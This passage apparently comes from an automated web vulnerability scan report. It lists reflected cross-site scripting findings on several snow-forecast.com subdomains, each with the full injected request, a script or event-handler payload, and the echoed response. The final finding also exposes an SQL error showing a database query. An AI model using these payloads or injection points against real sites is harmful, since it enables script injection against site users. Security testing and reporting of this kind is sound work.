HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:53 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "011042d8a74a0eea65bdaf43b5812132" X-Runtime: 462 Content-Length: 24235 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the ' request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a01cd"><script>alert(1)</script>b5a4cbb6879 was submitted in the ' parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'a01cd"><script>alert(1)</script>b5a4cbb6879 HTTP/1.1 Host: se.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:53 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "b5a19bebbdccb74ac90ed1399f38c33d" X-Runtime: 55 Content-Length: 18096 Set-Cookie: sfcsid=62c0a7710c996eef1dbf11746e3323c3; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9576"><script>alert(1)</script>3763d4ccba7 was submitted in the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3Eb9576"><script>alert(1)</script>3763d4ccba7 HTTP/1.1 Host: se.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:53 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "9c5b7de3cbd130b0c481673ac4e15d9e" X-Runtime: 55 Content-Length: 19271 Set-Cookie: sfcsid=b576f49d6f02676cfaf62888fc15438b; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.70. http://se.snow-forecast.com/login [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://se.snow-forecast.com
Path:
/login
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93761"><script>alert(1)</script>65b683182f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?93761"><script>alert(1)</script>65b683182f7=1 HTTP/1.1 Host: se.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:52 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "8ec353fab81239cde01d19f0feacaa42" X-Runtime: 114 Content-Length: 18192 Set-Cookie: sfcsid=efae265515c8f69fb7eef66cf0604e89; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.71. http://se.snow-forecast.com/newsletter_subscriptions/new [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://se.snow-forecast.com
Path:
/newsletter_subscriptions/new
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13fb8"><script>alert(1)</script>a9260badab7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsletter_subscriptions/new?13fb8"><script>alert(1)</script>a9260badab7=1 HTTP/1.1 Host: se.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:54 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "d551a881e3a5db578911af2d6a48e736" X-Runtime: 58 Content-Length: 27699 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.72. http://se.snow-forecast.com/resorts/Courchevel [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://se.snow-forecast.com
Path:
/resorts/Courchevel
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ea19"><script>alert(1)</script>f7071c68d5d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resorts/Courchevel?5ea19"><script>alert(1)</script>f7071c68d5d=1 HTTP/1.1 Host: se.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:55 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "dbce31c2d0a98eca4251c6537b2d546b" X-Runtime: 504 Content-Length: 42511 Set-Cookie: last_loc=135; path=/; expires=Sun, 09-Feb-2031 22:13:54 GMT Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9680"><img%20src%3da%20onerror%3dalert(1)>a93d804e4be was submitted in the REST URL parameter 2. This input was echoed as b9680"><img src=a onerror=alert(1)>a93d804e4be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /collections/vendorsb9680"><img%20src%3da%20onerror%3dalert(1)>a93d804e4be HTTP/1.1 Host: store.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:14:08 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding Status: 404 Not Found X-UA-Compatible: IE=Edge,chrome=1 X-Cache: miss X-Runtime: 0.065478 Set-Cookie: _session_id=99fc374310a44115199325602684bd1e; path=/; HttpOnly Cache-Control: no-cache Content-Length: 2494
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.74. http://tr.snow-forecast.com/iso_countries/choose [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://tr.snow-forecast.com
Path:
/iso_countries/choose
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96967"><script>alert(1)</script>4d1439ca23e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iso_countries/choose?96967"><script>alert(1)</script>4d1439ca23e=1 HTTP/1.1 Host: tr.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:14:08 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "1e76c5cd91148e78580b3f52f8a50a35" X-Runtime: 63 Content-Length: 24359 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the ' request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload def70"><script>alert(1)</script>94a0ed9113c was submitted in the ' parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'def70"><script>alert(1)</script>94a0ed9113c HTTP/1.1 Host: tr.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:14:10 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "08671f8ed86c1a4778cafc16dcba6517" X-Runtime: 50 Content-Length: 18195 Set-Cookie: sfcsid=a76f472098413f0aa84a132cddc643bb; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9737c"><script>alert(1)</script>35334400e8c was submitted in the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E9737c"><script>alert(1)</script>35334400e8c HTTP/1.1 Host: tr.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:14:09 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "60905297ad34aeab40cb0a8f46348f43" X-Runtime: 56 Content-Length: 19311 Set-Cookie: sfcsid=26b4eb004bb730e1a15ef1b461e14737; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.77. http://tr.snow-forecast.com/login [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://tr.snow-forecast.com
Path:
/login
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5832"><script>alert(1)</script>3ac32b78344 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?e5832"><script>alert(1)</script>3ac32b78344=1 HTTP/1.1 Host: tr.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:14:09 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "81df54d56af7064ba20501edfeab0612" X-Runtime: 97 Content-Length: 18182 Set-Cookie: sfcsid=4384b045f39d79b88fda2dbb2e53e270; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.78. http://tr.snow-forecast.com/newsletter_subscriptions/new [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://tr.snow-forecast.com
Path:
/newsletter_subscriptions/new
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0d4f"><script>alert(1)</script>8a9ee4f8def was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsletter_subscriptions/new?f0d4f"><script>alert(1)</script>8a9ee4f8def=1 HTTP/1.1 Host: tr.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:14:10 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "4eba8be69acd821c4f119041030310cb" X-Runtime: 72 Content-Length: 27709 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.79. http://tr.snow-forecast.com/resorts/Courchevel [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://tr.snow-forecast.com
Path:
/resorts/Courchevel
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 990b3"><script>alert(1)</script>1bdd82fa708 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resorts/Courchevel?990b3"><script>alert(1)</script>1bdd82fa708=1 HTTP/1.1 Host: tr.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:14:10 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "35dce7f6145bd170581e051adc492fcc" X-Runtime: 155 Content-Length: 42805 Set-Cookie: last_loc=135; path=/; expires=Sun, 09-Feb-2031 22:14:10 GMT Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.80. http://www.snow-forecast.com/iso_countries/choose [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.snow-forecast.com
Path:
/iso_countries/choose
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98180"><script>alert(1)</script>522bd4d206a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iso_countries/choose?98180"><script>alert(1)</script>522bd4d206a=1 HTTP/1.1 Host: www.snow-forecast.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: last_loc=135; __gads=ID=cc928eff2cc47df6:T=1297288507:S=ALNI_MbdH5VwVHJYOLwaNwsH1okrwCmJGw; __utmz=262007119.1297288591.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=262007119.969865198.1297288577.1297288577.1297288577.1; __utmc=262007119; __utmb=262007119.1.10.1297288577; sfcsid=a26c06d23e0901be19d070ea32094f1f
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 21:58:03 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Status: 200 OK ETag: "118722e948809bb1282aec54f4ed4910" X-Runtime: 41 Cache-Control: private, max-age=0, must-revalidate Content-Length: 24319
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the '"--></style></script><script>alert(0x0005CE)</script> request parameter is copied into the HTML document as plain text between tags. The payload 433b3<script>alert(1)</script>c95c64a7a60 was submitted in the '"--></style></script><script>alert(0x0005CE)</script> parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'"--></style></script><script>alert(0x0005CE)</script>433b3<script>alert(1)</script>c95c64a7a60 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.snow-forecast.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2eaf5"><script>alert(1)</script>8fce27d7c98 was submitted in the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E2eaf5"><script>alert(1)</script>8fce27d7c98 HTTP/1.1 Host: www.snow-forecast.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: last_loc=135; __gads=ID=cc928eff2cc47df6:T=1297288507:S=ALNI_MbdH5VwVHJYOLwaNwsH1okrwCmJGw; __utmz=262007119.1297288591.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sfcsid=a26c06d23e0901be19d070ea32094f1f; __utma=262007119.969865198.1297288577.1297288577.1297288577.1; __utmc=262007119; __utmb=262007119.3.10.1297288577
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:04:34 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Status: 200 OK ETag: "aad7517e6b8c9cd895a55a621f07e228" X-Runtime: 49 Cache-Control: private, max-age=0, must-revalidate Content-Length: 19885
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.83. http://www.snow-forecast.com/login [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.snow-forecast.com
Path:
/login
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8172b"><script>alert(1)</script>86410f04713 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?8172b"><script>alert(1)</script>86410f04713=1 HTTP/1.1 Host: www.snow-forecast.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: last_loc=135; __gads=ID=cc928eff2cc47df6:T=1297288507:S=ALNI_MbdH5VwVHJYOLwaNwsH1okrwCmJGw; __utmz=262007119.1297288591.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sfcsid=a26c06d23e0901be19d070ea32094f1f; __utma=262007119.969865198.1297288577.1297288577.1297288577.1; __utmc=262007119; __utmb=262007119.2.10.1297288577
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 21:58:05 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Status: 200 OK ETag: "786f1b4bf6183085be03f4fde9eb1203" X-Runtime: 43 Cache-Control: private, max-age=0, must-revalidate Content-Length: 18786
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.84. http://www.snow-forecast.com/newsletter_subscriptions/new [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.snow-forecast.com
Path:
/newsletter_subscriptions/new
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbcda"><script>alert(1)</script>6952b24a14b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:02:34 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Status: 200 OK ETag: "0b4c7b42cca923631b0a089278d98f61" X-Runtime: 57 Cache-Control: private, max-age=0, must-revalidate Content-Length: 27756
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.85. http://www.snow-forecast.com/resorts/Courchevel [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.snow-forecast.com
Path:
/resorts/Courchevel
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89c44"><script>alert(1)</script>63ffc41f183 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resorts/Courchevel?89c44"><script>alert(1)</script>63ffc41f183=1 HTTP/1.1 Host: www.snow-forecast.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <title>Courchevel Ski Re ...[SNIP]... <a href="http://hu.snow-forecast.com/resorts/Courchevel?89c44"><script>alert(1)</script>63ffc41f183=1"> ...[SNIP]...
The value of the size_id request parameter is copied into the HTML document as plain text between tags. The payload c91fe<script>alert(1)</script>c0fdc2d1de3 was submitted in the size_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sbban/image.php?size_id=833c91fe<script>alert(1)</script>c0fdc2d1de3&resort=135 HTTP/1.1 Host: www.snow-forecast.com Proxy-Connection: keep-alive Referer: http://www.snow-forecast.com/resorts/Courchevel Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: last_loc=135; __gads=ID=cc928eff2cc47df6:T=1297288507:S=ALNI_MbdH5VwVHJYOLwaNwsH1okrwCmJGw
DB Error: syntax error select * from sbbanners_ads where (resort=135 or resort is null) and (size_id=833c91fe<script>alert(1)</script>c0fdc2d1de3 or size_id= -1) and approved='yes' and paid='yes' and alowban_size ='yes' and ( (sbtype=1 and credits> ...[SNIP]...